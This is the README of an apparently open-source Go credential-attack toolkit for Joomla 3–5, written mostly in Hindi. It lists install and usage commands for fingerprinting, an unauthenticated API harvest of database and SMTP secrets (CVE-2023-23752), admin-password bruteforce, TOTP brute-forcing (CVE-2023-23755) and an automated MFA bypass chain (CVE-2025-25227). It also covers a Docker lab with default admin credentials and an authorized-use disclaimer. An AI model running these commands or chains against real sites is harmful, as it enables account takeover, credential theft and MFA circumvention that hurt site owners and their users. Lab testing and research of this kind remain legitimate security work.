
आधुनिक Joomla Auth-attack Toolkit J3 / J4 / J5 - CVE-2023-23752 · CVE-2023-23755 · CVE-2025-25227

आधुनिक Joomla ऑथ-अटैक टूलकिट
J3 / J4 / J5 - CVE-2023-23752 · CVE-2023-23755 · CVE-2025-25227
Joomla संस्करण 3, 4, और 5 को कवर करने वाला क्रेडेंशियल-अटैक टूलकिट। छह उप-कमांड पूरी अटैक श्रृंखला को एंड-टू-एंड संभालते हैं:
detect - संस्करण फ़िंगरप्रिंट (मैनिफेस्ट XML → जनरेटर मेटा → एडमिन मार्कअप)enum - CVE-2023-23752 अनधिकृत API हार्वेस्ट: उपयोगकर्ता नाम, DB होस्ट/उपयोगकर्ता/पासवर्ड, SMTP क्रेडेंशियल, एप्लिकेशन सीक्रेटbrute - प्रति-कार्यकर्ता सत्र अलगाव और चार-परिणाम वर्गीकरण (सफल / mfa-आवश्यक / अमान्य / अवरुद्ध) के साथ समवर्ती एडमिन लॉगिन ब्रूटफोर्सmfa-brute - कैप्टिव MFA स्क्रीन पर CVE-2023-23755 संपूर्ण 6-अंकीय TOTP हमलाmfa-bypass - आधे-प्रमाणित सत्र पर view=methods (और चार अन्य उम्मीदवार दृश्यों/कार्यों) के माध्यम से CVE-2025-25227 MFA बायपासchain - पूर्ण ऑटोपायलट: detect → enum → brute → जब ब्रूट कैप्टिव स्क्रीन पर पहुँचे तो स्वचालित MFA-बायपास पिवटएकल स्थैतिक बाइनरी, कोई रनटाइम निर्भरता नहीं। प्रति-कार्यकर्ता कुकी जार के साथ नेटिव goroutine समवर्तीता। SIEM इंजेस्ट के लिए JSONL आउटपुट। HTTP/HTTPS/SOCKS5 प्रॉक्सी समर्थन। Joomla 3.10, 4.2.7, और 5.4.6 डॉकर लैब्स के विरुद्ध एंड-टू-एंड सत्यापित।
# Option A - Go install (requires Go 1.22+)
go install github.com/rvzsec/joombrute/cmd/joombrute@latest
# Option B - Pre-built binary from releases
curl -L -o joombrute https://github.com/rvzsec/joombrute/releases/latest/download/joombrute-linux-amd64
chmod +x joombrute
# Option C - Build from source
git clone https://github.com/rvzsec/joombrute
cd joombrute
make
joombrute detect -u <target>
joombrute enum -u <target>
joombrute brute -u <target> --user admin -w rockyou.txt -c 20
joombrute mfa-brute -u <target> --user admin --password <pw> -c 50
joombrute mfa-bypass -u <target> --user admin --password <pw>
joombrute chain -u <target> -w rockyou.txt -c 20
# JSONL output for piping / SIEM ingest
joombrute --json brute -u <target> --user admin -w rockyou.txt > hits.jsonl
CVE-2025-25227 MultiFactorAuthenticationHandler::needsMultiFactorAuthenticationRedirection() का शोषण करता है, जो $onlyCaptive फ़्लैग के बिना isMultiFactorAuthenticationPage() को कॉल करता है - बायपास-छूट सूची में मौन रूप से MFA प्रबंधन दृश्य (view=methods, view=method, view=callback, task=method.add …) शामिल होते हैं, जिन पर आधा-प्रमाणित सत्र कैप्टिव चुनौती को हल किए बिना नेविगेट कर सकता है।
detect - joomla.xml मैनिफेस्ट → <meta name="generator"> → एडमिन मार्कअप के माध्यम से फ़िंगरप्रिंटenum - CVE-2023-23752 अनधिकृत API हार्वेस्ट (उपयोगकर्ता, DB होस्ट/उपयोगकर्ता/पासवर्ड, SMTP, ऐप सीक्रेट)brute - एडमिन फ़ॉर्म ब्रूटफोर्स, प्रति-कार्यकर्ता सत्र अलगाव, चार-परिणाम वर्गीकरण (success / mfa-required / invalid / blocked)mfa-brute - कैप्टिव स्क्रीन पर CVE-2023-23755 6-अंकीय TOTP ब्रूटmfa-bypass - CVE-2025-25227 स्टेट-चेक बायपास प्रोब (गैर-विनाशकारी)chain - पूर्ण ऑटो: detect → enum → brute → MFA-बायपास प्रोबmake lab # docker compose up + seed J3.10 / J4.2.7 / J5.x with admin user
make smoke # end-to-end against all three (no MFA)
make lab-mfa # seed a known TOTP secret on J4 admin (for mfa-* tests)
make smoke-mfa # brute -> mfa-required, mfa-bypass VULN, chain auto-pivot
make lab-mfa-off # remove the MFA record (back to plain admin)
make lab-down # tear it all down
लैब इंस्टॉलर Joomla के वेब इंस्टॉलर को पूरी तरह बायपास करता है - इंस्टॉल SQL को सीधे MySQL में लोड करता है, एक एडमिन उपयोगकर्ता (admin / admin1234) डालता है, एक न्यूनतम configuration.php लिखता है। seed_mfa.php Joomla के स्वयं के AES-128-CBC + सीक्रेट-की एन्क्रिप्शन का उपयोग करता है ताकि कैप्टिव एंडपॉइंट इसे सही ढंग से डिक्रिप्ट कर सके। केवल लैब के लिए - दोनों स्क्रिप्ट lab/docker-compose.yml से मानक joombrute-* कंटेनर नाम मानती हैं।
make all
# produces dist/joombrute-{linux,darwin,windows}-{amd64,arm64} statically linked
केवल अधिकृत सुरक्षा परीक्षण। उन्हीं सिस्टम पर चलाएँ जिनके परीक्षण की आपके पास स्पष्ट लिखित अनुमति हो। यह ऐसा ट्रैफ़िक उत्पन्न करता है जिसे कोई भी IDS पकड़ लेगा। अनुचित उपयोग के लिए अनुरक्षक सभी दायित्व अस्वीकार करते हैं।
Ravindu Wickramasinghe | rvz (@rvzsec) · www.zyenra.com
मूल Joomla 3 ब्रूट अवधारणा: @ajnik CVE-2023-23752 श्रृंखला अनुसंधान: VulnCheck
| CVE | प्रभावित संस्करण | मोड | पैच किया गया | लैब-सत्यापित |
|---|
| CVE-2023-23752 | 4.0.0 - 4.2.7 | enum | 4.2.8 (2023-02) | ✅ J4.2.7 |
| CVE-2023-23755 | 4.2.0 - 4.3.1 | mfa-brute | 4.3.2 (2023-05) | ✅ J4.2.7 |
| CVE-2025-25227 | 4.0.0 - 4.4.12, 5.0.0 - 5.2.5 | mfa-bypass | 4.4.13 / 5.2.6 (2025-04) | ✅ J4.2.7 |